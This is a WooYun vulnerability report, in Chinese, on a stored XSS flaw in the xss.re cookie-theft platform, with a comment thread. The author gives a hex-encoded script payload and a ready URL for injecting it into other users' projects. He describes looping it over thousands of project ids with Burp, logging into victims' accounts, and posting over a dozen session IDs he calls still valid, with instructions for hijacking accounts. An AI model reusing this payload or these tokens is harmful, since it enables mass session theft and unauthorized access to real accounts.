当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-059832

漏洞标题:某XSS利用平台安全漏洞(泄漏大量cookies)

相关厂商:08sec.com

漏洞作者: 浩天

提交时间:2014-05-09 11:31

修复时间:2014-06-23 11:31

公开时间:2014-06-23 11:31

漏洞类型:设计缺陷/逻辑错误

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-05-09: 细节已通知厂商并且等待厂商处理中
2014-05-09: 厂商已经确认,细节仅向厂商公开
2014-05-19: 细节向核心白帽子及相关领域专家公开
2014-05-29: 细节向普通白帽子公开
2014-06-08: 细节向实习白帽子公开
2014-06-23: 细节向公众公开

简要描述:

某XSS平台存在缺陷,导致可登陆他人账号,各种各样的后台碎了一地,这样别人都为我钓鱼,我吃鱼就好了,哈哈!!卑鄙、下流、无耻已经无法形容我了,呵呵!
xss太暴力、太血腥了,看了很多账号,真尼玛什么人才都有啊,插的是惊天地、泣鬼神,真是什么站都敢插啊。
@xsser @疯狗 @90_ @U神

详细说明:

很多同学都说我射的好,其实插的也很不错的!
下面看详情:
问题xss平台:这个平台确实挺好用的,xss利用方法好多,非常集中
http://xss.re
下面看图

1.jpg


cookie里面的js原样写在页面,被执行了,其实很早就发现了,当时xss一个钓鱼的站发现的,今天特意仔细看了下,传过来的cookie里面的特殊字符没有处理

2.jpg


我是怎么做的呢,用土豆的一个xss做的实验

3.jpg


然后我有了个大胆的想法

4.jpg


然后我就付诸了行动

5.jpg


人一高兴就容易犯二,script需要浏览器支持才能运行,burpsuit哪行啊,妹的
先兜个圈子,先手动检测一下是否可行,用别人账号建的项目,id:4541

6.jpg


用盗取的cookie登陆一下4541,居然可以登录成功

7.jpg


这货在搞圆通,算不算我捡到的,没见提wooyun啊,一会我提交吧

8.jpg


9.jpg

漏洞证明:

实验是成功的,是不是很猥琐,接下来是更无耻之极的想法,实现批量盗cookie
为了能更迅速、简单我有仔细的研究了下,走了很多弯路、浪费了不少时间,得出以下结论和利用方法:
你只需要将下面的数字替换成自己的项目ID,然后加密成16进制,传给diy[cookie]
<script src=http://xss.re/4543></script>
然后加密成16进制
0x253343736372697074253230737263253344687474702533412F2F7873732E72652F343534332533452533432F736372697074253345
传给diy[cookie]参数
然后组成下面的连接,然后在替换id为xss.re中别人项目的ID即可实现xss他人的xss.re的页面盗取cookie,就1项,盗取即可登录,可以捡后台去了
http://xss.re/XSS/?do=api&act=r&id=4550&diy[cookie]=0x253343736372697074253230737263253344687474702533412F2F7873732E72652F343534332533452533432F736372697074253345
本来用js就能搞定,但是请求太多、太连续、太大量时,xss.re就会限制我ip,我js太渣,又懒
然后用上面得到的链接配合burpsiut实现慢速循环发送请求

x1.jpg


x3.jpg


项目id从1111-4542,其实从1-4600就可以,这样就实现把我的xss脚本植入到每一个开启盗取cookie的项目中去了,我所要做的事,就是无耻的等大家上线,呵呵,话说下午还真没人上,可是等到下班的时候,我了个去啊

13.jpg


14.jpg


然后我就开始遍历这些账号,真是什么人才都有,google、QQ邮箱、bing、黑基等等都能xss
黑基:

15.jpg


a1.jpg


a2.jpg


QQ邮箱?

a3.jpg


google、bing?我猜是想让搜索引擎抓有问题站,然后执行xss,而且他可能成功了

a4.jpg


其他一些项目,不一一列举了,看不过来了

a5.jpg


a6.jpg


说下xss.re的cookie,就一项PHPSESSID,它的实效时间应该是所绑定账号下一次登录的时候
我贴出来一些现在应该还能用,你只需要自己注册一个,然后登录,修改PHPSESSID即可
PHPSESSID=mdb6d7c9es9ej99vft14ugp8e0 这几个是最新的
PHPSESSID=ia3jrj1hl8mhntc938r64oba45 新
PHPSESSID=hmmtv11m3qbrpscbbc5vsi8jv3 新
PHPSESSID=v6k25dnlablhtvflh5pr5ctqj7 新
m186amdnbu0q9anh5cjb77kvu6
7enof00u6kjaude2ocqf59bn25
jdrd180pvjanvsbkfmuvv21l25
ftk7dplb3rmtmuv5u8u476ib62
an4iaeh7ujqp6tn3m6nllhpd46
gd7sqj1gbb0r1914km142ev823
hmqu85g1pe9cdifoo5dob401u1
r1qt3p9cgt1cnvl5gmkld4mvm1
q4j6j9ch0fihfsq1qqbar5mre1
3fvg8eov3b9olk4umpu7n0hbm0
733ebf48bjjpgdg5o7cfavv7f2
mdb6d7c9es9ej99vft14ugp8e0

xss.re插自己.png

修复方案:

不藏着了,想想都觉得无耻

版权声明:转载请注明来源 浩天@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2014-05-09 11:52

厂商回复:

非常感谢楼主对08安全团队的关注与支持,小小礼物不成敬意。

最新状态:

暂无


漏洞评价:

评论

  1. 2014-05-09 11:36 | 卡卡 ( 普通白帽子 | Rank:447 漏洞数:52 | <script>alert('安全团队长期招人')</scrip...)

    谁敢当二楼?

  2. 2014-05-09 11:57 | 浩天 认证白帽子 ( 普通白帽子 | Rank:915 漏洞数:79 | 度假中...)

    妈呀,我怀二胎了

  3. 2014-05-09 11:59 | 浩天 认证白帽子 ( 普通白帽子 | Rank:915 漏洞数:79 | 度假中...)

    怕有影响,没敢按大厂商走放在首页,走的小厂商

  4. 2014-05-09 12:10 | 卡卡 ( 普通白帽子 | Rank:447 漏洞数:52 | <script>alert('安全团队长期招人')</scrip...)

    我私信你了,还不回~~~

  5. 2014-05-09 12:31 | 浩天 认证白帽子 ( 普通白帽子 | Rank:915 漏洞数:79 | 度假中...)

    @08sec.com 再送个info的邀请码如何

  6. 2014-05-09 20:54 | 动后河 ( 实习白帽子 | Rank:51 漏洞数:13 | ☭)

      是http://xss.re/user/login这个平台吧,反正觉得不好用,还有08的泄露信息查询,白花了我50元,好郁闷

  7. 2014-05-09 21:05 | 浩天 认证白帽子 ( 普通白帽子 | Rank:915 漏洞数:79 | 度假中...)

    @动后河 那是你我用的不好,等这个案例公开了,你就知道别人用的有多好了

  8. 2014-05-09 21:17 | 动后河 ( 实习白帽子 | Rank:51 漏洞数:13 | ☭)

    @浩天 wow!!!有淘宝的吗?

  9. 2014-05-10 02:04 | Mosuan ( 普通白帽子 | Rank:449 漏洞数:175 | 尘封此号,不装逼了,再见孩子们。by Mosua...)

    貌似我去年弄过,不知道是不是,当时没测试完整,反正任意弹窗了

  10. 2014-05-10 09:01 | 浩天 认证白帽子 ( 普通白帽子 | Rank:915 漏洞数:79 | 度假中...)

    @动后河 我能说有么,百度都有,但是在这个案例里没放图

  11. 2014-05-10 23:57 | 小火苗 ( 路人 | Rank:6 漏洞数:1 | 我是一只小火苗呀,春风吹又生呀...)

    这样不是可以根据返回页面找到不少未公开的xss。

  12. 2014-05-13 19:57 | if、so 认证白帽子 ( 核心白帽子 | Rank:1008 漏洞数:91 | 梦想还是要有的,万一实现了呢?)

    @浩天 哈哈,笑死了

  13. 2014-05-16 22:39 | Mosuan ( 普通白帽子 | Rank:449 漏洞数:175 | 尘封此号,不装逼了,再见孩子们。by Mosua...)

    @浩天 win7+118.67.127.168+北京!黑阔你好,应该跟我之前测试的那个一样,不过当时没测试完整

  14. 2014-05-17 08:44 | 浩天 认证白帽子 ( 普通白帽子 | Rank:915 漏洞数:79 | 度假中...)

    @Mosuan 我也是早就发现没测完整,有一天抽空仔细看了看

  15. 2014-05-18 12:21 | Mosuan ( 普通白帽子 | Rank:449 漏洞数:175 | 尘封此号,不装逼了,再见孩子们。by Mosua...)

    @浩天 当时太凌乱了,刚才想了一下,应该跟我测试的一模一样

  16. 2014-05-20 14:03 | 浩天 认证白帽子 ( 普通白帽子 | Rank:915 漏洞数:79 | 度假中...)

    @08sec.com 小小礼物在哪里

  17. 2014-05-29 15:53 | Mosuan ( 普通白帽子 | Rank:449 漏洞数:175 | 尘封此号,不装逼了,再见孩子们。by Mosua...)

    @浩天 一直很疑惑,怎么开始cookie邮件提醒?之前我记得我开启过

  18. 2014-05-29 16:04 | 浩天 认证白帽子 ( 普通白帽子 | Rank:915 漏洞数:79 | 度假中...)

    @Mosuan 礼物是个很小很小的U盘,我很开心吖

  19. 2014-05-29 16:04 | 浩天 认证白帽子 ( 普通白帽子 | Rank:915 漏洞数:79 | 度假中...)

    这二年手里好多优盘了

  20. 2014-05-29 16:48 | Mosuan ( 普通白帽子 | Rank:449 漏洞数:175 | 尘封此号,不装逼了,再见孩子们。by Mosua...)

    @浩天 我问你怎么开启邮件提醒……你跟我说u盘干嘛

  21. 2014-05-30 09:14 | 浩天 认证白帽子 ( 普通白帽子 | Rank:915 漏洞数:79 | 度假中...)

    @Mosuan 自动的吧,我邮件提醒都爆仓了

  22. 2014-05-30 09:59 | Mosuan ( 普通白帽子 | Rank:449 漏洞数:175 | 尘封此号,不装逼了,再见孩子们。by Mosua...)

    @浩天 那我怎么没有

  23. 2014-06-03 03:49 | 伟哥 ( 普通白帽子 | Rank:110 漏洞数:29 | 不怕流氓有文化,就怕色狼有耐心,那么一只起...)

    关注

  24. 2014-06-08 12:26 | B1acken ( 普通白帽子 | Rank:174 漏洞数:56 | 渣渣)

    围观大牛

  25. 2014-06-13 17:26 | 小怿 ( 路人 | Rank:29 漏洞数:6 | )

    把cookie改成xss的代码。。然后盗取xss平台cookie。。你这就是黑吃黑啊!

  26. 2014-07-08 08:57 | depycode ( 普通白帽子 | Rank:275 漏洞数:44 | 关注网络安全,提高技术!)

    这个你提交做什么啊 我操

  27. 2014-07-17 18:10 | 浩森 ( 路人 | Rank:30 漏洞数:6 )

    好吧 居然看到我的了。。

  28. 2014-07-17 18:13 | 浩天 认证白帽子 ( 普通白帽子 | Rank:915 漏洞数:79 | 度假中...)

    @浩森 弟弟(三声),你来啦

  29. 2014-08-06 14:46 | 进击的zjx ( 普通白帽子 | Rank:295 漏洞数:61 | 工作需要,暂别一段时间)

    黑吃黑!掉渣天!